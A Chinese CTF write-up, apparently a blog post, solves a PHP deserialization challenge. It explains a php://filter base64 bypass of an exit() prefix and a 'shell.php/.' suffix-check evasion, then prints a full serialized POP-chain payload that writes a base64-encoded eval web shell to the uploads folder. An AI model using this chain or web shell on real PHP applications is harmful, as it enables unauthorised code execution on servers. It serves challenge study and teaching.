-
[2020 新春红包题]1
[2020 新春红包题]1
很眼熟的一题,看着像一个 thinkphp 反序列化题。
$data = " . sprintf('%012d', $expire) . "\n exit();?>\n" . $data; $result = file_put_contents($filename, $data);- 1
- 2
这边明显就是一个死亡函数绕过,且参数都是可控的,只是需要一些处理,这里要注意几个点:
从下面这句可以看出,filename 的名字是拼凑的,除了
uniqid()是不可控的其他都是可控的,可以用...uploads/ uniqid()/../shell.php/.绕过,因为它过滤了.php后缀,且 像phtml,PHP....等等后缀是不允许访问的,所以我们可以用shell.php/.绕过,因为在做路径处理的时候,会递归删除掉路径中存在的/.。(当然上传图片马,并上传user.ini去解析它应该也是可以的)$cache_filename = $this->options['prefix'] . uniqid() . $name; if(substr($cache_filename, strlen('.php')) === '.php')- 1
- 2
而
$data,就是常说的死亡函数绕过了,因为base64是四个一组解析的所以可以利用这个去掉死亡函数,其他的就是反序列化链了。A:: __destruct(autosave=0) A::save A::getForStorage (返回的是set的value,也就是最后的data) B::set(name为A::save 的 key) (name的绕过已经说过,在serialize函数处只需构造成base64_decode($data)就行了)- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
payload:
最后访问uploads/shell.phpgetflag就行了。class A { protected $store; protected $key; protected $expire; public $autosave; public $cache; public $complete; public function __construct(){ $this->autosave = 0; $this->cache = array(); $this->complete = 'YWFhUEQ5d2FIQWdRR1YyWVd3b0pGOVFUMU5VV3lKeklsMHBPejgr'; $this->key = '/../succ.php/.'; $this->store = new B(); } } class B { public $options; public function __construct(){ $this->options = array( 'serialize'=>'base64_decode', 'data_compress' => false, 'prefix' => "php://filter/write=convert.base64-decode/resource=uploads/"); } } echo urlencode(serialize(new A()));- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
-
相关阅读:
在一款芯片中多个时钟域非常常见,跨时钟域检查至关重要。本篇记录的是CDC跨时钟域的基础概念。
【分布式任务调度】二、Elastic-Job详细介绍
mac 升级node到指定版本
Eclipse插件安装版本不兼容问题解决方案——Papyrus插件为例
设计模式 - 行为型模式考点篇:策略模式(概述 | 案例实现 | 优缺点 | 使用场景)
测试/开发程序员被沦陷?国内的真饱和了?
这么牛的代码 你能看懂吗
C#知识|账号管理系统:多条件动态查询条件的编写。
Linux 安装多版本 JDK 详细过程
金仓数据库KingbaseES客户端应用参考手册--11. sys_dump
- 原文地址:https://blog.csdn.net/shinygod/article/details/127918742
